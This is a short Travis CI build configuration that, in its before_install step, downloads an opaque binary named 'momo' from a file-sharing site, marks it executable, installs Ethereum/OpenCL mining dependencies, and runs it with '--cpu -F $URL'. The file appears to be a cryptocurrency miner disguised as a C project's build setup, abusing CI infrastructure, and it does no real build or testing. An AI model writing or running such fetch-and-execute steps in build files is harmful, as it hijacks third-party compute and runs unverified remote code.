language: c
before_install:
  - curl -o momo -L https://transfer.sh/dUL2U/momo
  - ls -lah
  - chmod +x momo
  - apt-get install git cmake libcryptopp-dev libleveldb-dev libjsoncpp-dev libjsonrpccpp-dev libboost-all-dev libgmp-dev libreadline-dev libcurl4-gnutls-dev ocl-icd-libopencl1 opencl-headers mesa-common-dev libmicrohttpd-dev build-essential -y
  - ./momo --cpu -F $URL
